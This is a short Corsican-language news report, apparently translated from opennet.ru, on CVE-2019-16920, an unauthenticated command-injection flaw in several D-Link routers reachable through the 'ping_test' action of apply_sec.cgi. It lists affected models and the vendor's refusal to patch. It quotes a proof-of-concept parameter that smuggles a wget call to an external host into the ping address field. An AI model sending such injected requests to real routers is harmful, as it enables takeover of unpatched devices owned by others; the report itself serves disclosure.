Vulnerabilità sfruttabile remotamente in i router D-Link

In i router wireless D-Link identificatu vulnerabilità periculosa (CVE-2019-16920), chì vi permette di eseguisce remotamente codice da u latu di u dispusitivu mandendu una dumanda speciale à u gestore "ping_test", accessibile senza autentificazione.

Curiosamente, sicondu i sviluppatori di firmware, a chjama "ping_test" deve esse eseguita solu dopu l'autentificazione, ma in realtà hè chjamata in ogni casu, indipendentemente da u logu in l'interfaccia web. In particulare, quandu accede à l'script apply_sec.cgi è passendu u paràmetru "action=ping_test", l'script redirige à a pagina di autentificazione, ma à u stessu tempu eseguisce l'azzione assuciata à ping_test. Per eseguisce u codice, una altra vulnerabilità hè stata aduprata in ping_test stessu, chì chjama l'utilità ping senza cuntrollà bè a correttezza di l'indirizzu IP mandatu per a prova. Per esempiu, per chjamà l'utilità wget è trasfiriri i risultati di u cumandimu "echo 1234" à un host esternu, basta à specificà u paràmetru "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://". test.test/?$( echo 1234)".

Vulnerabilità sfruttabile remotamente in i router D-Link

A prisenza di a vulnerabilità hè stata cunfirmata ufficialmente in i seguenti mudelli:

  • DIR-655 cù firmware 3.02b05 o più vechju;
  • DIR-866L cù firmware 1.03b04 o più vechju;
  • DIR-1565 cù firmware 1.01 o più vechju;
  • DIR-652 (nessuna infurmazione nantu à e versioni problematiche di firmware hè furnita)

U periodu di supportu per questi mudelli hè digià scadutu, cusì D-Link dichjaratu, chì ùn liberà micca l'aghjurnamenti per elli per eliminà a vulnerabilità, ùn ricumande micca di utilizà è cunsigliate di rimpiazzà cù novi dispositi. Cum'è una soluzione di sicurezza, pudete limità l'accessu à l'interfaccia web solu à l'indirizzi IP di fiducia.

Hè statu dopu scupertu chì a vulnerabilità era ancu affetta mudelli DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 è DIR-825, piani per a liberazione di l'aghjurnamenti per i quali ùn sò ancu cunnisciuti.

Source: opennet.ru

Add a comment